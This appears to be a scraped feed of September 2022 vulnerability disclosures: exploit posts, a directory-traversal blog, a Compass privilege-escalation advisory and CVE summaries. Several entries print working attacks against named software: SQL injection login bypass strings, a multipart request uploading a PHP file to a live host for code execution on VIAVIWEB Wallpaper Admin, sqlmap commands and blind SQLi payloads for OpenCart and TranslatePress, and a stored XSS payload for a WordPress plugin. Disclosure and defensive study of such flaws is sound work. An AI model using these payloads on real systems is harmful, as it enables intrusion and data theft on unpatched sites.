VIAVIWEB Wallpaper Admin suffers from remote shell upload and remote SQL injection vulnerabilities.

    ```# Exploit Title: [VIAVIWEB Wallpaper Admin - Multiple vulnrabilities]# Google Dork: intext:"Wallpaper Admin"   "LOGIN" "password" "Username"# Date: [18/09/2022]# Exploit Author: [Edd13Mora]# Vendor Homepage: [www.viaviweb.com]# Version: [N/A]# Tested on: [Windows 11 - Kali Linux]------------------SQLI on the Login page------------------payload --> admin' or 1=1-- ----POC:---[1] Disable JavaScript on ur browser put the payload and submit[2] Reactive JavaScript and resend the request---------------------------Authenticated SQL Injection:---------------------------Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/edit_gallery_image.php?img_id=[number]-----------------------------------------------Remote Code Execution (RCE none authenticated):-----------------------------------------------Poc:----Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/add_gallery_image.php?add=yes--------------------Burp Request :--------------------POST /hd_wallpaper/add_gallery_image.php?add=yes HTTP/2Host: http://googlezik.freehostia.comCookie: _octo=GH1.1.993736861.1663458698; PHPSESSID=qh3c29sbjr009jdg8oraed4o52User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------33893919268150571572221367848Content-Length: 467Origin: http://googlezik.freehostia.comReferer: http://googlezik.freehostia.com/hd_wallpaper/add_gallery_image.php?add=yesUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailers-----------------------------33893919268150571572221367848Content-Disposition: form-data; name="category_id"1-----------------------------33893919268150571572221367848Content-Disposition: form-data; name="image[]"; filename="poc.php"Content-Type: image/png<?php phpinfo(); ?>-----------------------------33893919268150571572221367848Content-Disposition: form-data; name="submit"-----------------------------33893919268150571572221367848--Uploaded File can be found here :--------------------------------http://localhost/PAth-Where-Script-Installed/categories/```

VIAVIWEB Wallpaper Admin SQL Injection / Shell Upload

/vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module for GLPI through 10.0.2 allows PHP code injection.

Absent directory?: .

/

.

/

internal\_utilities

/

htmLawed?cve=title

/

Directory specified probably doesn't exist, or is not a directory, or could not be accessed, possibly because of file-permission or server configuration issues

Go to root

CVE-2022-35914: absent?: ././internal_utilities/htmLawed?cve=title/ | PHP Labware source code viewer

Zentao Demo15 is vulnerable to Directory Traversal. The impact is: obtain sensitive information (remote). The component is: URL : view-source:https://demo15.zentao.pm/user-login.html/zentao/index.php?mode=getconfig.

_I am Shubham Sudhir Sawant a Security Researcher, super thrilled to write my very first blog. Medium is one of my favorite platform where I can read on Security Bug blogs. I came across so many great contents which made me write one today. It not only helps us grow our knowledge or built our skill set in a particular field but also in exploring new ideas and think out of the box._

This article gives a walk through on what directory traversal is, explains how to perform path traversal attack, and elucidate how to prevent directory traversal vulnerability.

> **_What is Directory Traversal?_**

Path Traversal alias Directory Traversal, is a web related vulnerability that allows an attacker to read arbitrary files on the server running an application. (Example: application assets, backend systems credentials, and sensitive operating system files). In certain cases, an attacker can potentially tamper the arbitrary file on the server, which eventually give full control over the server running the application.

> **_Read arbitrary file through directory traversal_**

The Basic Steps are given below:

1\. Shoot up **Burp Professional** Suite/ **Burp Community** Edition Tool on your browser.

2\. Open The Web Application which has to be intercepted in burp Intercept **proxy tab**.

3\. Now before intercepting, set the proxy in web browser **network setting**.

4\. Open the burp tool and enable the **proxy intercept** tab.

5\. The request URL will be captured and send it to the **repeater** to launch the attack.

6\. Look for an Crawled Website(performed in repeater tab)

In Crawled Website I found the below URL:-

https://demo15.zentao.pm/user-login.html/zentao/index.php?mode=getconfig

Figure 1: File Path Traversal Simple Example

{“version”:”16.5",”requestType”:”PATH\_INFO”,”requestFix”:”-”,”moduleVar”:”m”,”methodVar”:”f”,”viewVar”:”t”,”sessionVar”:”zentaosid”,”systemMode”:”new”,”sprintConcept”:”0",”URAndSR”:”0",”sessionName”:”zentaosid”,”sessionID”:”vgpgn3knuc5g2jod6uptc8db42",”random”:7923,”expiredTime”:”1440",”serverTime”:1663360511,”rand”:7923}

I found it is a sensitive config file which is getting executed for which was assigned a CVE-2022–37700

> **_How to prevent a directory traversal attack?_**

Although there are many ways in which the security professionals can avoid the possibility of path traversal attack some preventive measure are listed below: which includes..

1\. User supplied dynamic input should be strictly validated before being passed to any filesystem operation. After validating user input, the application can use a suitable filesystem API to verify that the file to be accessed is actually located within the base directory used by the application.

2\. Input containing dot-dot-slash sequences should be blocked.

3\. Also, the directory used to store files that are accessed using user supplied dynamic input can be located on a separate logical volume to other sensitive application and operating system files, so that these cannot be reached via path traversal attacks.

4\. If user provided data passed to input filesystem APIs is unavoidable then 2 layers of defense should be used together such as:

\- 1st step : The application should validate user input before processing it. This done by comparing to the whitelist of permitted values. If this is not possible then it should be validated based of “alphanumeric characters.”

\- 2nd step: After validation the application should append the input to the base directory and use a platform filesystem API to canonicalize the path.

**_For example: A java code to validate the canonical path of a file based on user input:_**

File f = new File (base\_Dir, user\_Input);

If (f.getCanonicalPath() .startsWith(base\_Dir))

{

//process file

}

5\. The developer should avoid storing sensitive data in the web root of the application.

6\. It is advisable to run the latest version of these web servers because by default it will have good directory security, if possible one can make sure that they are running the latest version (up- to-date with current patches).

> **_References_**

1\. https://portswigger.net/web-security/file-path-traversal

2\. https://www.acunetix.com/websitesecurity/directory-traversal/

3\. https://portswigger.net/daily-swig/patched-wordpress-plugin-still-susceptible-to-attacks

4\. https://portswigger.net/daily-swig/vulnerability-found-in-oracle-pos-terminals

5\. https://owasp.org/www-project-web-security-testing-guide/latest/4-Web\_Application\_Security\_Testing/05-Authorization\_Testing/01-Testing\_Directory\_Traversal\_File\_Include

CVE-2022-37700: CVE-2022–37700 Directory Transversal in ZenTao Easy soft ALM v16.5

The folioupdate service in Fabasoft Cloud Enterprise Client 22.4.0043 allows Local Privilege Escalation.

################################################################################ # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ################################################################################ # # Product: Fabasoft Cloud Enterprise Client # Vendor: Fabasoft # CSNC ID: CSNC-2022-010 # CVE ID: CVE-2022-29908 # Subject: Local Privilege Escalation # Risk: High # Effect: Locally exploitable # Authors: Tino Kautschke # Date: 14.09.2022 # ################################################################################ Introduction: ------------- The Fabasoft Cloud lets you create a digital business network for your company based on relationships of trust – for secure cross-company, transnational collaboration in the cloud. Fabasoft provides a native client that allows, for example, editing documents directly via the web client or synchronizing documents on the device. \[1-3\] Compass Security identified a local privilege escalation vulnerability, allowing a user on a system with the Fabasoft Cloud Enterprise Client installed, to escalate their privileges to local administrator. Affected: --------- Vulnerable: \* Fabasoft Cloud Enterprise Client 22.4.0043 No other version was tested, but it is possible for older versions to be vulnerable. Not vulnerable: \* Fabasoft Cloud Enterprise Client 22.4.0045 Other products were affected (Windows only) \[4\]: Fabasoft Folio / Fabasoft eGov-Suite 2021 UR3, Fabasoft Folio / Fabasoft eGov-Suite 2022, Fabasoft Business Process Cloud Technical Description: ---------------------- The Fabasoft Cloud Enterprise Client uses an update service named FabasoftCloudUS.exe, which is executed with SYSTEM privileges. On update, it looks for new update files in C:\\ProgramData\\fabasoft.plugin, which can be read and written to by arbitrary users. The update service expects a signed MSI file and an empty file with extension '.pending' in this folder to start the update process. The validation check for signed MSI files is vulnerable. It is possible to sign an arbitrary MSI package with a self-signed certificate containing Fabasoft's information in the certificate fields. The validation check will accept the self-signed MSI package and start the setup process with SYSTEM privileges. This means that an unprivileged user can execute arbitrary MSI packages, thus resulting in code execution with full SYSTEM permissions. This can be, e.g., exploited by executing a reverse shell or other malicious commands. Workaround / Fix: ----------------- The validation process for signed MSI files should be revised to ensure that it is not possible to install packages from untrusted sources. A patch has already been released by the publisher. \[4\] The update service should not run in a high privileged context like SYSTEM. It is recommended to set up a dedicated service user with neccessary privileges only. As a customer using the Fabasoft Cloud Enterprise Client, update your installation to the latest version. Workaround: disable Fabasoft Folio Client Update Service "folioupdate". Timeline: --------- 2022-04-13: Discovery by Tino Kautschke 2022-04-13: Initial vendor notification 2022-04-21: Fabasoft public announcement and release of fixed version 2022-04-29: Vulnerability registered as CVE-2022-29908 2022-09-14: Coordinated disclosure of the advisory References: ----------- \[1\] https://help.cloud.fabasoft.com/index.php?topic=doc/User-Help-Fabasoft-Cloud-eng/introduction.htm \[2\] https://help.cloud.fabasoft.com/index.php?topic=doc/Fabasoft-Cloud-Client/introduction.htm \[3\] https://help.cloud.fabasoft.com/index.php?topic=doc/Technical-Information-eng/the-fabasoft-cloud-enterprise-client.htm \[4\] https://www.fabasoft.com/en/support/knowledgebase/client-autoupdate-harmful-code-installation-vulnerability-fsc33251

CVE-2022-29908

Red Hat Security Advisory 2022-6541-01 - PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. Issues addressed include file overwrite and traversal vulnerabilities.

Red Hat Security Advisory 2022-6541-01

OpenCart 3.x Newsletter Custom Popup module version 4.0 suffers from a remote blind SQL injection vulnerability.

    # Exploit Title: OpenCart v3.x So Newsletter Custom Popup Module - Blind SQL Injection# Date: 18/09/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.opencart.com/# Software Link: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=40259&filter_search=newsletter&filter_license=1&sort=date_added# Version: v.4.0# Tested on: XAMPP, Linux# Contact: https://twitter.com/dmaral3noz* Description :So Newsletter Custom Popup Module is compatible with any Opencart allows SQL Injection via parameter 'email' in index.php?route=extension/module/so_newletter_custom_popup/newsletter. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.* Steps to Reproduce :- Go to : http://127.0.0.1/index.php?route=extension/module/so_newletter_custom_popup/newsletter- Save request in BurpSuite- Run saved request with : sqlmap -r sql.txt -p email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbsRequest :===========POST /index.php?route=extension/module/so_newletter_custom_popup/newsletter HTTP/1.1Content-Type: application/x-www-form-urlencodedCookie: OCSESSID=aaf920777d0aacdee96eb7eb50Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflateContent-Length: 29Host: 127.0.0.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0Connection: Keep-alivecreatedate=2022-8-28%2019:4:6&email=hi&status=0===========Output :Parameter: #1* ((custom) POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: createdate=2022-8-28 19:4:6&email=hi' AND 4805=4805-- nSeP&status=0    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: createdate=2022-8-28 19:4:6&email=hi' AND (SELECT 4828 FROM(SELECT COUNT(*),CONCAT(0x7176627071,(SELECT (ELT(4828=4828,1))),0x7178786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sRQS&status=0

OpenCart 3.x Newsletter Custom Popup 4.0 SQL Injection

WordPress GetYourGuide Ticketing plugin version 1.0.1 suffers from a persistent cross site scripting vulnerability.

    # *Exploit Title*: WordPress Plugin ‘GetYourGuide Ticketing’  - StoredCross-Site Scripting# Date: 18-09-2022# Exploit Author: Mariam Tariq - HunterSherlock# Vendor Homepage:https://wordpress.org/plugins/search/GetYourGuide+Ticketing/# Version: 1.0.1# Tested on: Firefox# Contact me: mariamtariq404@gmail.com# *Vulnerable code*:``` <input type="text" name="partner_hash" value="<?php echo $partner_hash?>"></input> ```# *POC*:1- Install the plugin ‘GetYourGuide Ticketing’ & activate it.2- Navigate toward the GYG-Ticketing3- Enter the XSS payload ` “><img src=x onerror=alert(1)>`4- Go to link builder to verify the XSS pop-up.#* POC image*:https://imgur.com/amrDhIt

WordPress GetYourGuide Ticketing 1.0.1 Cross Site Scripting

The Translate Multilingual sites WordPress plugin before 2.3.3 is vulnerable to an authenticated SQL injection. By adding a new language (via the settings page) containing specific special characters, the backticks in the SQL query can be surpassed and a time-based blind payload can be injected.

While investigating Wordpress plugins, I stumbled upon “Translatepress Multilingual”, which is used to make Wordpress pages available in multiple languages and has 200,000 active installations.

It is not so easy to find SQL injections in Wordpress plugins, as wordpress has a feature called “magic quotes”, which means it automatically applies the addslashes PHP function to all GET and POST input, escaping quotes and backslashes. Therefore, many of the classic SQL injection attacks cannot work against wordpress, as it is impossible to break out of quotes. Still, there are some scenarios when user input is not surrounded by quotes, for example when it is supposed to be an integer. Today, we will have a closer look at another case.

In the Translatepress source code, there are a couple of functions that look like this:

The language code taken from the input parsed by a function called get_table_name and in addition to the magic quotes protection, we also have to bypass sanitize_text_field .

The language code is prefixed with a constant string and a filter is applied. However, I could not find this filter, so this seems to have no effect.

When looking at the SQL query, you can see that the table name is only surrounded by backticks. However, neither sanitize_text_field nor the magic quotes escape backticks.

I fired up a brand new Wordpress instance using docker-compose as described in this tutorial: https://docs.docker.com/samples/wordpress/. If you want to try this, make sure to also use a new Wordpress instance, as the exploit will mess up your database.

I installed and activated the at the time latest version of Translatepress Multilingual, 2.3.2. Then, I went to the Translatepress settings page, added a random language, English (UK), and intercepted the request with Burp Suite. Time to start injecting some payloads!

I started with `x=%23 , where %23 refers to # , which is needed to comment out the rest of the query. This should trigger an error if we can escape the backticks.

And yes, we can see a couple of SQL syntax errors flooding the window where we ran sudo docker-compose up :

We can see from these errors that our payload gets inserted into multiple statements, namely CREATE TABLE , CREATE_INDEX and CREATE FULLTEXT INDEX . However, these commands seemed uncommon to achieve a useful SQL injection attack vector, so I kept looking.

I went to the “Pages” section, opened “Sample Page” and clicked “Translate”. An editor opened up where I could translate strings, and I noticed more error messages in the Wordpress log.

Note that this happened without submitting another payload. My previous payload got inserted in some other statements, e.g. SELECT . As we can control the full SQL query after the table name, I concluded it should be easy to utilize a time-based payload.

I copied the POST request that adds a language from Burp Suite to translatepress_req.txt :

I also copied the GET request where we can execute the payload in a SELECT statement to translatepress_req_2.txt :

Time to launch sqlmap to execute a so-called second-order attack (because we have different pages for submitting the payload and viewing the result). This is the right command to use, specifying a few non-default option to speed up the detection:

sqlmap -r translatepress\_req.txt -p trp\_settings%5Btranslation-languages%5D%5B%5D — dbms=mysql — second-req translatepress\_req\_2.txt — technique=T — level 5 — risk 3 — fresh-queries

Now it is possible to use sqlmap at the full extent to download tables, for example the wp_users table, or do whatever is possible in the context of your database configuration.

It might also be possible to exploit this vulnerability using a boolean-based blind or UNION technique. It did not work out of the box, probably because the payload is inserted in many statements and breaks at least one of the queries that are necessary to show proper output. I did not spend much time trying to improve this, as I already had a time-based PoC.

This exploit can only be executed by an authenticated user, as you need to add a new language. I don’t know the Translatepress ecosystem well enough to know if only the administrator can add languages, or also some other roles. This might also depend on installed addons and custom configurations.

It is also worth noting that above PoC might need to be modified a little when the Pro version of Translatepress is attacked. Both Pro and Free are vulnerable, as the code responsible for the sanitization is the same, but I have not actually tried this yet with a Pro installation.

Shortly after I reported this vulnerability to the vendor, they released a patched update (version 2.3.3) which is using a regular expression to block malicious language codes.

You can find this exploit also on Github:

If you want to read about more vulnerabilities I discover, make sure you follow me on LinkedIn, Medium & Twitter:

If you run a company and are looking for an expert to make sure your web applications are secure, feel free to send an email to elias.hohl@ehtec.co to receive an offer.

CVE-2022-3141: Authenticated SQL injection vulnerability in “Translatepress Multilingual” Wordpress plugin

Modern Campus Omni CMS (formerly OU Campus) 10.2.4 allows login-page SQL injection via a '" OR 1 = 1 -- - , <?php' substring.

Instantly share code, notes, and snippets.

CVE-2022-40766: SQL Injection in OU Campus

Craft CMS 4.2.0.1 is vulnerable to Cross Site Scripting (XSS) via `src/helpers/Cp.php`.

**Craft CMS Cross site Scripting vulnerability**

Moderate severity GitHub Reviewed Published Sep 17, 2022 • Updated Sep 20, 2022

Tag

#php